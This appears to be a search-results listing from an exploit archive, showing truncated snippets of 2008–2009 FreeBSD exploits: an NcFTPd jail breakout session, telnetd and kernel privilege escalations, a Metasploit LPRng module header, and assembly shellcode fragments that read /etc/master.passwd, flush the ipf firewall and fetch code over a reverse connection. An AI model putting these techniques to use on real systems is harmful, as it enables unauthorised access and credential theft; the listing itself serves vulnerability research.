24 matches found
NcFTPd <= 2.8.5 - Remote Jail Breakout Vulnerability
No description provided by source. NcFTPd <= 2.8.5 remote jail breakout Discovered by: Kingcope Contact: kcope2atgooglemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFT...
LPRng use_syslog Remote Format String Vulnerability
This module exploits a format string vulnerability in the LPRng print server. This vulnerability was discovered by Chris Evans. There was a publicly circulating worm targeting this vulnerability, which prompted RedHat to pull their 7.0 release. They consequently re-released it as "7.0-respin". Th...
LPRng use_syslog Remote Format String Vulnerability
$Id: lprngformatstring.rb 8530 2010-02-17 00:56:28Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
NcFTPD 2.8.5 Jail Breakout
NcFTPd googlemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 latest version: ftp 192.168.2.5 Connected to 192.168.2.5. 220 localhost NcFTPd Server unregister...
NcFTPd <= 2.8.5 Remote Jail Breakout Vulnerability
Exploit for freebsd platform in category remote exploits ================================================== NcFTPd get /etc/passwd passwd local: passwd remote: /etc/passwd 502 Unimplemented command. 227 Entering Passive Mode 192,168,2,5,219,171 550 No such file. ftp ls .. 227 Entering Passive Mod...
NcFTPd 2.8.5 - Remote Jail Breakout
NcFTPd 2.8.5 - Remote Jail Breakout NcFTPd googlemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 latest version: ftp 192.168.2.5 Connected to 192.168.2.5. 22...
FreeBSD/x86 - setuid(0)&execve({"//sbin/ipf","-Faa",0},0); - 57 bytes
No description provided by source. ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax push eax mov al, 0x17 int 0x80 ; --------------------- -Faa xo...
FreeBSD/x86 - execve(/bin/cat & /etc/master.passwd) - 65 bytes
No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...
FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation
FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation FreeBSD 7.0-RELEASE telnet daemon local privilege escalation - And possible remote root code execution. There is a rather big bug in the current FreeBSD telnetd daemon. The environment is not properly sanitized when executing /bin/login, wha...
FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit
Exploit for freebsd platform in category local exploits ==================================================================== FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit ==================================================================== FreeBSD 7.0-RELEASE telnet daemon...
FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation
FreeBSD 7.0-RELEASE telnet daemon local privilege escalation - And possible remote root code execution. There is a rather big bug in the current FreeBSD telnetd daemon. The environment is not properly sanitized when executing /bin/login, which leads to a possible remote root hole. The telnet protoc...
FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit
No description provided by source. FreeBSD 7.0-RELEASE telnet daemon local privilege escalation - And possible remote root code execution. There is a rather big bug in the current FreeBSD telnetd daemon. The environment is not properly sanitized when executing /bin/login, which leads to a possible...
FreeBSD 7/6x protosw kernel exploit
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 uname -rs FreeBSD 7.0-RELEASE id uid=1001donb gid=1001donb groups=1001donb,0wheel grep ^root /etc/master.passwd grep: /etc/master.passwd: Permission denied nm /boot/kernel/kernel | grep allproc c0bf26b8 B allproc c0bf2670 B allproclock cc -o x x.c ./x...
freebsd/x86 rev connect, recv, jmp, return results 90 bytes
No description provided by source. / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 shellcodeinfile ; setuid0; socket; connect; dups; recv; jmp; exit; ; 90...
freebsd/x86 rev connect, recv, jmp, return results 90 bytes
Exploit for freebsd/x86 platform in category shellcode =========================================================== freebsd/x86 rev connect, recv, jmp, return results 90 bytes =========================================================== / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exi...
freebsd/x86 rev connect, recv, jmp, return results 90 bytes
freebsd/x86 rev connect, recv, jmp, return results 90 bytes. Shellcode exploit for freebsdx86 platform / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 pls ex...
freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes
No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...
freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes
Exploit for freebsd/x86 platform in category shellcode ============================================================ freebsd/x86 /bin/cat /etc/master.passwd NULL free 65 bytes ============================================================ ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBS...
freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes
No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...
freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 56 bytes
No description provided by source. ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 56 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax ;0 mov al, 0x17 int 0x80 ; --------------------- -Faa xor eax,...